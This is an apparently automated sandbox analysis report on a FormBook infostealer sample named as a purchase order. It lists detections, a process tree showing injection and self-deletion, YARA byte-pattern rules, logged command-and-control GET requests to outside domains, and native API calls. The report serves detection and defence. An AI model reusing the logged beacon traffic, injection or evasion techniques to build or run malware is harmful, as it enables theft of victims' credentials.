Loading ...

Play interactive tourEdit tour

Analysis Report PO8479349743085.exe

Overview

General Information

Sample Name:PO8479349743085.exe
Analysis ID:299748
MD5:ed96c254e53b9d7a33827da32e02d513
SHA1:5c074c70293c77c4d1409facdc930de69070917d
SHA256:92625b5d11e691107b8aa2e733c1be9fe3677b5a86f03e08f239bf6e0d450885
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO8479349743085.exe (PID: 6848 cmdline: 'C:\Users\user\Desktop\PO8479349743085.exe' MD5: ED96C254E53B9D7A33827DA32E02D513)
    • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • PO8479349743085.exe (PID: 2412 cmdline: C:\Users\user\Desktop\PO8479349743085.exe MD5: ED96C254E53B9D7A33827DA32E02D513)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 6972 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 4912 cmdline: /c del 'C:\Users\user\Desktop\PO8479349743085.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.483500047.0000000003050000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000E.00000002.483500047.0000000003050000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000E.00000002.483500047.0000000003050000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16079:$sqlite3step: 68 34 1C 7B E1
    • 0x1618c:$sqlite3step: 68 34 1C 7B E1
    • 0x160a8:$sqlite3text: 68 38 2A 90 C5
    • 0x161cd:$sqlite3text: 68 38 2A 90 C5
    • 0x160bb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.303207332.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.303207332.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.PO8479349743085.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.PO8479349743085.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.PO8479349743085.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16079:$sqlite3step: 68 34 1C 7B E1
        • 0x1618c:$sqlite3step: 68 34 1C 7B E1
        • 0x160a8:$sqlite3text: 68 38 2A 90 C5
        • 0x161cd:$sqlite3text: 68 38 2A 90 C5
        • 0x160bb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
        4.2.PO8479349743085.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.PO8479349743085.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x75c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7962:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13275:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x12d61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13377:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x134ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x836a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x11fdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x90e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18357:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x193ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO8479349743085.exeReversingLabs: Detection: 14%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.483500047.0000000003050000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.303207332.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.484413318.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.484363775.0000000004CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.303608231.0000000001280000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.303384560.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.263141935.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.PO8479349743085.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.PO8479349743085.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO8479349743085.exe.2fc0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO8479349743085.exe.2fc0000.2.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: PO8479349743085.exeJoe Sandbox ML: detected
          Source: 4.2.PO8479349743085.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.PO8479349743085.exe.2fc0000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_00862535 FindFirstFileExW,0_2_00862535
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00862535 FindFirstFileExW,4_2_00862535
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4x nop then pop edi4_2_0041502C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop edi14_2_0306502C

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49744
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49748
          Source: global trafficHTTP traffic detected: GET /d8h/?C8blf=NdndnTqh&nbWlB=0JNaWD+vE3WAKhUwjj+TKeKuqytbEj/rGf7L+MsFdzHuvdvProgHb0a/NNpWXL1yVbSl HTTP/1.1Host: www.bottrader.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?nbWlB=BeM5oIWdPTJOiFnjQO+IqBO/neltk2vktJQt+Ph2cW5xLg9JehTbyWJpLiwdZ9hJan65&C8blf=NdndnTqh HTTP/1.1Host: www.jerseycoastcollectibles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?C8blf=NdndnTqh&nbWlB=hDlxEqga3BcFycAw+Ryjn8fIDSDvAlpACarbBMYBexJf7I8708/imcYQGcjEnGSvwPkN HTTP/1.1Host: www.talayer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?nbWlB=LF/+HPnAhfbCOGMevCy5LeffOdBaHMczRS15DZo0qD0NchnlxbNeb0leR6j20NPT7waA&C8blf=NdndnTqh HTTP/1.1Host: www.citizen10.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?C8blf=NdndnTqh&nbWlB=ulW4hg8UHoOCNCMZObeLzGLAYISMMUrPq5Lyb801GJDl4BJ6h+xiXEGVrq4k7hgZjF5Q HTTP/1.1Host: www.matu-edu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?nbWlB=uz3DzrbHiMvht9e3OTxEc/Gw23kb4NUduvWFYO5nDH9JvfbAptXw1jORji9I2x8XS1KH&C8blf=NdndnTqh HTTP/1.1Host: www.hendieboards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: CHINA169-BACKBONECHINAUNICOMChina169BackboneCN CHINA169-BACKBONECHINAUNICOMChina169BackboneCN
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: DREAMHOST-ASUS DREAMHOST-ASUS
          Source: global trafficHTTP traffic detected: GET /d8h/?C8blf=NdndnTqh&nbWlB=0JNaWD+vE3WAKhUwjj+TKeKuqytbEj/rGf7L+MsFdzHuvdvProgHb0a/NNpWXL1yVbSl HTTP/1.1Host: www.bottrader.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?nbWlB=BeM5oIWdPTJOiFnjQO+IqBO/neltk2vktJQt+Ph2cW5xLg9JehTbyWJpLiwdZ9hJan65&C8blf=NdndnTqh HTTP/1.1Host: www.jerseycoastcollectibles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?C8blf=NdndnTqh&nbWlB=hDlxEqga3BcFycAw+Ryjn8fIDSDvAlpACarbBMYBexJf7I8708/imcYQGcjEnGSvwPkN HTTP/1.1Host: www.talayer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?nbWlB=LF/+HPnAhfbCOGMevCy5LeffOdBaHMczRS15DZo0qD0NchnlxbNeb0leR6j20NPT7waA&C8blf=NdndnTqh HTTP/1.1Host: www.citizen10.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?C8blf=NdndnTqh&nbWlB=ulW4hg8UHoOCNCMZObeLzGLAYISMMUrPq5Lyb801GJDl4BJ6h+xiXEGVrq4k7hgZjF5Q HTTP/1.1Host: www.matu-edu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?nbWlB=uz3DzrbHiMvht9e3OTxEc/Gw23kb4NUduvWFYO5nDH9JvfbAptXw1jORji9I2x8XS1KH&C8blf=NdndnTqh HTTP/1.1Host: www.hendieboards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.treehaire.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 18 Oct 2020 06:45:10 GMTServer: ApacheContent-Length: 277Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6a 65 72 73 65 79 63 6f 61 73 74 63 6f 6c 6c 65 63 74 69 62 6c 65 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.jerseycoastcollectibles.com Port 80</address></body></html>
          Source: explorer.exe, 00000007.00000000.290655420.000000000F640000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: PO8479349743085.exe, 00000000.00000002.262955804.00000000012EA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.483500047.0000000003050000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.303207332.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.484413318.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.484363775.0000000004CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.303608231.0000000001280000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.303384560.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.263141935.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.PO8479349743085.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.PO8479349743085.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO8479349743085.exe.2fc0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO8479349743085.exe.2fc0000.2.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000E.00000002.483500047.0000000003050000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.483500047.0000000003050000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.303207332.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.303207332.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.484413318.0000000004D20000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.484413318.0000000004D20000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.484363775.0000000004CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.484363775.0000000004CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.303608231.0000000001280000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.303608231.0000000001280000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.303384560.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.303384560.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.263141935.0000000002FC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.263141935.0000000002FC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.PO8479349743085.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.PO8479349743085.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.PO8479349743085.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.PO8479349743085.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO8479349743085.exe.2fc0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO8479349743085.exe.2fc0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO8479349743085.exe.2fc0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO8479349743085.exe.2fc0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00417B90 NtCreateFile,4_2_00417B90
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00417C40 NtReadFile,4_2_00417C40
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00417CC0 NtClose,4_2_00417CC0
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00417D70 NtAllocateVirtualMemory,4_2_00417D70
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00417B8B NtCreateFile,4_2_00417B8B
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00417CBA NtReadFile,4_2_00417CBA
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00417D6C NtAllocateVirtualMemory,4_2_00417D6C
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_01329910
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013299A0 NtCreateSection,LdrInitializeThunk,4_2_013299A0
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329860 NtQuerySystemInformation,LdrInitializeThunk,4_2_01329860
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329840 NtDelayExecution,LdrInitializeThunk,4_2_01329840
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013298F0 NtReadVirtualMemory,LdrInitializeThunk,4_2_013298F0
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329A20 NtResumeThread,LdrInitializeThunk,4_2_01329A20
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329A00 NtProtectVirtualMemory,LdrInitializeThunk,4_2_01329A00
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329A50 NtCreateFile,LdrInitializeThunk,4_2_01329A50
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329540 NtReadFile,LdrInitializeThunk,4_2_01329540
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013295D0 NtClose,LdrInitializeThunk,4_2_013295D0
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329710 NtQueryInformationToken,LdrInitializeThunk,4_2_01329710
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013297A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_013297A0
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329780 NtMapViewOfSection,LdrInitializeThunk,4_2_01329780
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329FE0 NtCreateMutant,LdrInitializeThunk,4_2_01329FE0
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_01329660
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013296E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_013296E0
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329950 NtQueueApcThread,4_2_01329950
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013299D0 NtCreateProcessEx,4_2_013299D0
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329820 NtEnumerateKey,4_2_01329820
